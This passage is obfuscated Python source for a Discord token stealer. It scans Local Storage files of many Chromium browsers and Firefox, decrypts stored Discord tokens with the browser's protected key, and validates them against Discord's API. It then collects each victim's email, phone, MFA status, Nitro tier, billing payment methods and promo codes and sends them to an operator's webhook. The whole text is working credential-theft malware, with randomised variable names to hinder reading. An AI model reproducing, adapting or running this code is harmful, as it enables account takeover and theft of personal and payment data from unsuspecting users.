            'Kometa': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
            'Orbitum': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
            'CentBrowser': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
            '7Star': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
            'Sputnik': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
            'Vivaldi': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome SxS': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
            'Google Chrome': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome1': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\',
            'Google Chrome2': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\',
            'Google Chrome3': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\',
            'Google Chrome4': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\',
            'Google Chrome5': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\',
            'Epic Privacy Browser': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
            'Microsoft Edge': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
            'Uran': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
            'Yandex': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Brave': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Iridium': BKJVPOTWGQDQGKKAWFHKHDBTUDORESHQTRVHIIMUTQJMFUASICOMAWPMRBWD + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
        }

        for LKIASPQHAINGLNETMANPEOKIPKZBJHDIFCUEQUBCQVPFQAFFRN, TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP in SYDOLIBBKNXKZENRXNWYXHRARDHTOASQRJMBUXIEOLTWAWUWXEMHLMRCLVOALSNOAOYE.items():
            if not os.path.exists(TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP):
                continue
            BIGEVFSXXSFPZLVMQWWRZQUYTPIRBALDIXEULJRRUJZUYBPCSMDDXPICCSBNKQXIRGTYZ = LKIASPQHAINGLNETMANPEOKIPKZBJHDIFCUEQUBCQVPFQAFFRN.replace(" ", "").lower()
            if "cord" in TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP:
                if not os.path.exists(IRUOINVNARWJZJLRZLMRJUGAUZIXYUBVQJWPRHYXHOQPSIEOTUQDIENZVISPNQPHHGLIHXMYGCVX + f'\\{BIGEVFSXXSFPZLVMQWWRZQUYTPIRBALDIXEULJRRUJZUYBPCSMDDXPICCSBNKQXIRGTYZ}\\Local State'):
                    continue
                for v4r_file_name in os.listdir(TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for y in re.findall(RZKLASSTMTXPWAOTLDVKSNPYXBCEZGXTIDOELBINUVWIGANJQSDEEKHFXQTU_enc, v4r_line.strip()):
                                PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA = YFQQRDSYPPDRAAEXFHKTZBVORQDBETVZENSUQLTYUNZAGWVLAFZEFTSWGEVUSEATNOPUFTUQCOFHVUVKDTTNTQTDAAIQCNLGVal(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), RDGNKLSKMSKZSBSXGQWPWTYYNCXYYZMCYFAPURQEVYZNLRWEUHWCQSZUFQTMQTWEKFGXCQSQ(IRUOINVNARWJZJLRZLMRJUGAUZIXYUBVQJWPRHYXHOQPSIEOTUQDIENZVISPNQPHHGLIHXMYGCVX + f'\\{BIGEVFSXXSFPZLVMQWWRZQUYTPIRBALDIXEULJRRUJZUYBPCSMDDXPICCSBNKQXIRGTYZ}\\Local State'))
                                if QDBAMAMEAVQEAGIWVDLQPEZBVSJEMMIFGVFKOHIZHDHCALMBVJFUDXHSJEOJDGJDEBRFSSZLINEBWIMQ(PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA, FDVZOUZYCWBGIOVUIHRTODKMKWZVEUZELMGZRCTWYHVAABZLENWLQBCDPIBDJLHWLOPYFL):
                                    DPZEKTWYJXZZLMOQLAMWILDSCECHXPDKHLMOJVRQNBYFSCSZRSFIMYPFCHTWEALNKJWYD = requests.get(FDVZOUZYCWBGIOVUIHRTODKMKWZVEUZELMGZRCTWYHVAABZLENWLQBCDPIBDJLHWLOPYFL, headers={'Authorization': PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA}).json()['id']
                                    if DPZEKTWYJXZZLMOQLAMWILDSCECHXPDKHLMOJVRQNBYFSCSZRSFIMYPFCHTWEALNKJWYD not in KOOUJVSZNYCEPDYXHAVOBWJUOTTCANGUGFJKFPHNBVYAGFLBQIVZZALNWPJ:
                                        RGNHUJYTGGQRRXWZKFXDUDDQSEJKXSQMXPEYRENVPLPGVMZDVWFAZKAOKVONTMZHUHQWSYUAU.append(PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA)
                                        KOOUJVSZNYCEPDYXHAVOBWJUOTTCANGUGFJKFPHNBVYAGFLBQIVZZALNWPJ.append(DPZEKTWYJXZZLMOQLAMWILDSCECHXPDKHLMOJVRQNBYFSCSZRSFIMYPFCHTWEALNKJWYD)
                                        HJDPHHIJOSCRFHRTYRPGWHRNXZJXAQKBFIDRZYDWWWTJHSRYERQXFRFFHILOIZCGDDDCAIGAJMQUQQKRTDFSFXG[PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA] = (LKIASPQHAINGLNETMANPEOKIPKZBJHDIFCUEQUBCQVPFQAFFRN, f"{TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP}\\{v4r_file_name}")
            else:
                for v4r_file_name in os.listdir(TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA in re.findall(RZKLASSTMTXPWAOTLDVKSNPYXBCEZGXTIDOELBINUVWIGANJQSDEEKHFXQTU, v4r_line.strip()):
                                if QDBAMAMEAVQEAGIWVDLQPEZBVSJEMMIFGVFKOHIZHDHCALMBVJFUDXHSJEOJDGJDEBRFSSZLINEBWIMQ(PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA, FDVZOUZYCWBGIOVUIHRTODKMKWZVEUZELMGZRCTWYHVAABZLENWLQBCDPIBDJLHWLOPYFL):
                                    DPZEKTWYJXZZLMOQLAMWILDSCECHXPDKHLMOJVRQNBYFSCSZRSFIMYPFCHTWEALNKJWYD = requests.get(FDVZOUZYCWBGIOVUIHRTODKMKWZVEUZELMGZRCTWYHVAABZLENWLQBCDPIBDJLHWLOPYFL, headers={'Authorization': PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA}).json()['id']
                                    if DPZEKTWYJXZZLMOQLAMWILDSCECHXPDKHLMOJVRQNBYFSCSZRSFIMYPFCHTWEALNKJWYD not in KOOUJVSZNYCEPDYXHAVOBWJUOTTCANGUGFJKFPHNBVYAGFLBQIVZZALNWPJ:
                                        RGNHUJYTGGQRRXWZKFXDUDDQSEJKXSQMXPEYRENVPLPGVMZDVWFAZKAOKVONTMZHUHQWSYUAU.append(PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA)
                                        KOOUJVSZNYCEPDYXHAVOBWJUOTTCANGUGFJKFPHNBVYAGFLBQIVZZALNWPJ.append(DPZEKTWYJXZZLMOQLAMWILDSCECHXPDKHLMOJVRQNBYFSCSZRSFIMYPFCHTWEALNKJWYD)
                                        HJDPHHIJOSCRFHRTYRPGWHRNXZJXAQKBFIDRZYDWWWTJHSRYERQXFRFFHILOIZCGDDDCAIGAJMQUQQKRTDFSFXG[PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA] = (LKIASPQHAINGLNETMANPEOKIPKZBJHDIFCUEQUBCQVPFQAFFRN, f"{TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP}\\{v4r_file_name}")

        if os.path.exists(IRUOINVNARWJZJLRZLMRJUGAUZIXYUBVQJWPRHYXHOQPSIEOTUQDIENZVISPNQPHHGLIHXMYGCVX + "\\Mozilla\\Firefox\\Profiles"):
            for TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP, _, v4r_files in os.walk(IRUOINVNARWJZJLRZLMRJUGAUZIXYUBVQJWPRHYXHOQPSIEOTUQDIENZVISPNQPHHGLIHXMYGCVX + "\\Mozilla\\Firefox\\Profiles"):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(f'{TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP}\\{v4r__file}', errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA in re.findall(RZKLASSTMTXPWAOTLDVKSNPYXBCEZGXTIDOELBINUVWIGANJQSDEEKHFXQTU, v4r_line.strip()):
                                    if QDBAMAMEAVQEAGIWVDLQPEZBVSJEMMIFGVFKOHIZHDHCALMBVJFUDXHSJEOJDGJDEBRFSSZLINEBWIMQ(PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA, FDVZOUZYCWBGIOVUIHRTODKMKWZVEUZELMGZRCTWYHVAABZLENWLQBCDPIBDJLHWLOPYFL):
                                        DPZEKTWYJXZZLMOQLAMWILDSCECHXPDKHLMOJVRQNBYFSCSZRSFIMYPFCHTWEALNKJWYD = requests.get(FDVZOUZYCWBGIOVUIHRTODKMKWZVEUZELMGZRCTWYHVAABZLENWLQBCDPIBDJLHWLOPYFL, headers={'Authorization': PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA}).json()['id']
                                        if DPZEKTWYJXZZLMOQLAMWILDSCECHXPDKHLMOJVRQNBYFSCSZRSFIMYPFCHTWEALNKJWYD not in KOOUJVSZNYCEPDYXHAVOBWJUOTTCANGUGFJKFPHNBVYAGFLBQIVZZALNWPJ:
                                            RGNHUJYTGGQRRXWZKFXDUDDQSEJKXSQMXPEYRENVPLPGVMZDVWFAZKAOKVONTMZHUHQWSYUAU.append(PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA)
                                            KOOUJVSZNYCEPDYXHAVOBWJUOTTCANGUGFJKFPHNBVYAGFLBQIVZZALNWPJ.append(DPZEKTWYJXZZLMOQLAMWILDSCECHXPDKHLMOJVRQNBYFSCSZRSFIMYPFCHTWEALNKJWYD)
                                            HJDPHHIJOSCRFHRTYRPGWHRNXZJXAQKBFIDRZYDWWWTJHSRYERQXFRFFHILOIZCGDDDCAIGAJMQUQQKRTDFSFXG[PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA] = ('Firefox', f"{TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP}\\{v4r__file}")
        return RGNHUJYTGGQRRXWZKFXDUDDQSEJKXSQMXPEYRENVPLPGVMZDVWFAZKAOKVONTMZHUHQWSYUAU, HJDPHHIJOSCRFHRTYRPGWHRNXZJXAQKBFIDRZYDWWWTJHSRYERQXFRFFHILOIZCGDDDCAIGAJMQUQQKRTDFSFXG

    def QDBAMAMEAVQEAGIWVDLQPEZBVSJEMMIFGVFKOHIZHDHCALMBVJFUDXHSJEOJDGJDEBRFSSZLINEBWIMQ(PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA, FDVZOUZYCWBGIOVUIHRTODKMKWZVEUZELMGZRCTWYHVAABZLENWLQBCDPIBDJLHWLOPYFL):
        return requests.get(FDVZOUZYCWBGIOVUIHRTODKMKWZVEUZELMGZRCTWYHVAABZLENWLQBCDPIBDJLHWLOPYFL, headers={'Authorization': PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA}).status_code == 200

    def YFQQRDSYPPDRAAEXFHKTZBVORQDBETVZENSUQLTYUNZAGWVLAFZEFTSWGEVUSEATNOPUFTUQCOFHVUVKDTTNTQTDAAIQCNLGVal(BMSXPRDRQUHAGBYHNLNYLECQMFNHIIUGJHHIVQVICPGWXKACEPMCJDUOWZCJEJQVJZVEUZJHGLYAIZXNUHSH, JBOHIHBLCFSCKNTKOMQMJCMXINSZAKOZAVRWRIUBLODKYEIYTBIMVWKZPRRH):
        ZNKOWOOHYBAZLYUNZLIPYIPVAODHEYPDHUTQWOMBUULIJCBVOQUQRZRSOBQMURWAHWTRVCAAXHONWLPZMYPTTXQTB = BMSXPRDRQUHAGBYHNLNYLECQMFNHIIUGJHHIVQVICPGWXKACEPMCJDUOWZCJEJQVJZVEUZJHGLYAIZXNUHSH[3:15]
        TBOPFURZBIDQYFIFWPYBMLOYLXSODAKQDKGSSKLLWJZXSNFJRCVYV = BMSXPRDRQUHAGBYHNLNYLECQMFNHIIUGJHHIVQVICPGWXKACEPMCJDUOWZCJEJQVJZVEUZJHGLYAIZXNUHSH[15:]
        YGQXVKVUXWGTPVJHGLUXGZRKCNSAHTVKEKHBNBMVHLRGKRTIVUCGRDVCCAGIVDFAYLENRHNVHMYEQAORGDRNLPAEEHSBK = AES.new(JBOHIHBLCFSCKNTKOMQMJCMXINSZAKOZAVRWRIUBLODKYEIYTBIMVWKZPRRH, AES.MODE_GCM, ZNKOWOOHYBAZLYUNZLIPYIPVAODHEYPDHUTQWOMBUULIJCBVOQUQRZRSOBQMURWAHWTRVCAAXHONWLPZMYPTTXQTB)
        return YGQXVKVUXWGTPVJHGLUXGZRKCNSAHTVKEKHBNBMVHLRGKRTIVUCGRDVCCAGIVDFAYLENRHNVHMYEQAORGDRNLPAEEHSBK.decrypt(TBOPFURZBIDQYFIFWPYBMLOYLXSODAKQDKGSSKLLWJZXSNFJRCVYV)[:-16].decode()

    def RDGNKLSKMSKZSBSXGQWPWTYYNCXYYZMCYFAPURQEVYZNLRWEUHWCQSZUFQTMQTWEKFGXCQSQ(TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP):
        if not os.path.exists(TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP):
            return None
        with open(TPKDUGZNUMBYFMGVKDUQMOWQBCUDDRYAUSQSLCOODOYXIHDDMXASOWYVHPTESJEYZUIEJUQMBAUGSGXSHDDROVFNIIZDBYMNOFZP, "r", encoding="utf-8") as v4r_f:
            CLRVVZJCPIYFYHUUIGNCOTYDECISKZDCCDGCXHIKLAVUZQRHWPSADMGRUTV = json.load(v4r_f)
        JBOHIHBLCFSCKNTKOMQMJCMXINSZAKOZAVRWRIUBLODKYEIYTBIMVWKZPRRH = base64.b64decode(CLRVVZJCPIYFYHUUIGNCOTYDECISKZDCCDGCXHIKLAVUZQRHWPSADMGRUTV["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(JBOHIHBLCFSCKNTKOMQMJCMXINSZAKOZAVRWRIUBLODKYEIYTBIMVWKZPRRH, None, None, None, 0)[1]

    RGNHUJYTGGQRRXWZKFXDUDDQSEJKXSQMXPEYRENVPLPGVMZDVWFAZKAOKVONTMZHUHQWSYUAU, HJDPHHIJOSCRFHRTYRPGWHRNXZJXAQKBFIDRZYDWWWTJHSRYERQXFRFFHILOIZCGDDDCAIGAJMQUQQKRTDFSFXG = PHHTFKTFLAIIZOKNOOOTECZUKEGJJIWSWRXSPTYFHPBXGTESCCJMKXRL()
    BAOXNCLADSTXFZJUMQBWXIVRCTYSIPYGWAXKCLCMKLAXSKDADA = SyncWebhook.from_url(OCBONEYMJYIPCZOBAOSUJGABJJYGCPZKJZIXKBSLXRQZLCUMWFREFDUNVOCHFAVSSKFGRLGESEB)

    if not RGNHUJYTGGQRRXWZKFXDUDDQSEJKXSQMXPEYRENVPLPGVMZDVWFAZKAOKVONTMZHUHQWSYUAU:
        ZMJOGKYVRCDXMCPWNDFFVAUMNXCTWCVTQUTVCDQEVJONOEGLAZXBRYTDQRICRMNNKKPYZZPYFGZSGDPLHWSLNNI(
            OCBONEYMJYIPCZOBAOSUJGABJJYGCPZKJZIXKBSLXRQZLCUMWFREFDUNVOCHFAVSSKFGRLGESEB, 
            title=f'Discord Token {QVIYKROFTLKFBPREUAZQHMCURAYNUQLAMCJOGJNSLSGAGTEUZLHEPCUTCROBJNSCUIFGHYVDDYBZUBITWQNLQE}:', 
            description=f"No discord tokens found."
        )
        return
    
    for PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA_d15c0rd in RGNHUJYTGGQRRXWZKFXDUDDQSEJKXSQMXPEYRENVPLPGVMZDVWFAZKAOKVONTMZHUHQWSYUAU:
        SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA_d15c0rd}).json()

        XIFMPYJUSPBDRNXOUXCCHIOMBIYXUEUAANSTSOURIBXBALIUEQOUUOMMAGZDMAJUIBLOEDQHPZCTFAQOZAIXOQCVMUXAU = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('username', "None") + '#' + SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('discriminator', "None")
        ZCWNAKGWZIYZWBMDFVIEIFHOZNMXBNGAUUYIRGEWLZCXJUZDMUCAYZU = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('global_name', "None")
        EUURNTBWOXDZCJKKJUTHIKKCPGYTQKJUJYVYSKVCTQFFDMDXNLMPBISSGKTFXTGCPWQNWKEIWGJSNJRWGGTCN = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('id', "None")
        GIOBYQDPRIVZVOPUDKOAVNANCCQVTQCBCMDIKIYJVBUECKQYEMWONEFBTZZGGKMAWEVBLWOVGJZLNWLRTWLLLFRBJOS = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('email', "None")
        TYYNMGCFLEZINVIWXODSKDYYUXXNUXRVDSOOAYEXXDSDOIWLKQHHXRZWQUXYYBTJMBFYSNGZCY = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('verified', "None")
        MZANKNAGVCPITTEGZBFTALSLTDPFZVOOOQCAPAQWGCNRXMVUIUVIPVKZWPCGAWAFACQTE = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('phone', "None")
        ZNAXSQFKTHDWFKOIVOLKALAUWBCAPBOYQWAWIQGQKQNFFVDMBOP = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('locale', "None")
        YOSFDFTYTAHBUVRVCSVKPKDUKAPCMNDAOVOMTNERZEGEGPISED = SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('mfa_enabled', "None")

        try:
            if SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('premium_type', 'None') == 0:
                TTMLRSSYAPEQMQOVVVVSTOJQWMOKXGLYYNODSSVSDLLGTLBNBYIUONYUXTP = 'False'
            elif SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('premium_type', 'None') == 1:
                TTMLRSSYAPEQMQOVVVVSTOJQWMOKXGLYYNODSSVSDLLGTLBNBYIUONYUXTP = 'Nitro Classic'
            elif SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('premium_type', 'None') == 2:
                TTMLRSSYAPEQMQOVVVVSTOJQWMOKXGLYYNODSSVSDLLGTLBNBYIUONYUXTP = 'Nitro Boosts'
            elif SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX.get('premium_type', 'None') == 3:
                TTMLRSSYAPEQMQOVVVVSTOJQWMOKXGLYYNODSSVSDLLGTLBNBYIUONYUXTP = 'Nitro Basic'
            else:
                TTMLRSSYAPEQMQOVVVVSTOJQWMOKXGLYYNODSSVSDLLGTLBNBYIUONYUXTP = 'False'
        except:
            TTMLRSSYAPEQMQOVVVVSTOJQWMOKXGLYYNODSSVSDLLGTLBNBYIUONYUXTP = "None"

        try: 
            PGJOOTBDFLUCFALQYKTBRJKQSRRBVKLWQYMRPYVITBZMARRWMAMDBOCCKRYHJKR = f"https://cdn.discordapp.com/avatars/{EUURNTBWOXDZCJKKJUTHIKKCPGYTQKJUJYVYSKVCTQFFDMDXNLMPBISSGKTFXTGCPWQNWKEIWGJSNJRWGGTCN}/{SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{EUURNTBWOXDZCJKKJUTHIKKCPGYTQKJUJYVYSKVCTQFFDMDXNLMPBISSGKTFXTGCPWQNWKEIWGJSNJRWGGTCN}/{SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{EUURNTBWOXDZCJKKJUTHIKKCPGYTQKJUJYVYSKVCTQFFDMDXNLMPBISSGKTFXTGCPWQNWKEIWGJSNJRWGGTCN}/{SVZKXXFKLQDZMNCNOKTVSVROKTGSQNGFMENEBQPWGHECGMSQUX['avatar']}.png"
        except: 
            PGJOOTBDFLUCFALQYKTBRJKQSRRBVKLWQYMRPYVITBZMARRWMAMDBOCCKRYHJKR = QHIGPIOECKCAUBQNBRBAUXHQCKLCIVGTZLZKRAGDSLIJELBKYMMJHKRSCDQI

        try:
            XMLVPPYJMDTUOXPWQYQSUYOBSNVKBMPJENKLMFIDNIMFGXCXEVUGHMRQTUISRZOBSUPCGTNMTWCXMFHYTLFBXONHKSXIRUUMMLMF = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA_d15c0rd}).json()
            if XMLVPPYJMDTUOXPWQYQSUYOBSNVKBMPJENKLMFIDNIMFGXCXEVUGHMRQTUISRZOBSUPCGTNMTWCXMFHYTLFBXONHKSXIRUUMMLMF:
                BXSTKNBNQDQHXLDGTPLYSBJNKOFHLPXUGYDCPWCCTKUHJLIHRNFGHDJEKMGFPXZNGLNTUEGHVYBZSG = []

                for v4r_method in XMLVPPYJMDTUOXPWQYQSUYOBSNVKBMPJENKLMFIDNIMFGXCXEVUGHMRQTUISRZOBSUPCGTNMTWCXMFHYTLFBXONHKSXIRUUMMLMF:
                    if v4r_method['type'] == 1:
                        BXSTKNBNQDQHXLDGTPLYSBJNKOFHLPXUGYDCPWCCTKUHJLIHRNFGHDJEKMGFPXZNGLNTUEGHVYBZSG.append('CB')
                    elif v4r_method['type'] == 2:
                        BXSTKNBNQDQHXLDGTPLYSBJNKOFHLPXUGYDCPWCCTKUHJLIHRNFGHDJEKMGFPXZNGLNTUEGHVYBZSG.append("Paypal")
                    else:
                        BXSTKNBNQDQHXLDGTPLYSBJNKOFHLPXUGYDCPWCCTKUHJLIHRNFGHDJEKMGFPXZNGLNTUEGHVYBZSG.append('Other')
                BXSTKNBNQDQHXLDGTPLYSBJNKOFHLPXUGYDCPWCCTKUHJLIHRNFGHDJEKMGFPXZNGLNTUEGHVYBZSG = ' / '.join(BXSTKNBNQDQHXLDGTPLYSBJNKOFHLPXUGYDCPWCCTKUHJLIHRNFGHDJEKMGFPXZNGLNTUEGHVYBZSG)
            else:
                BXSTKNBNQDQHXLDGTPLYSBJNKOFHLPXUGYDCPWCCTKUHJLIHRNFGHDJEKMGFPXZNGLNTUEGHVYBZSG = "None"
        except:
            BXSTKNBNQDQHXLDGTPLYSBJNKOFHLPXUGYDCPWCCTKUHJLIHRNFGHDJEKMGFPXZNGLNTUEGHVYBZSG = "None"

        try:
            DYRTMLORYFSBOUXITBCDONGSQZMKVBBCODEVENQEUWPEFEAFWTYDVPGDUJURWQA = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': PMVOIMKZVEYQGVKEARBNDBMYDBQMDQSMOJYYTKRLLSAXPPKWZLPSPJLCKKEKYA_d15c0rd}).json()
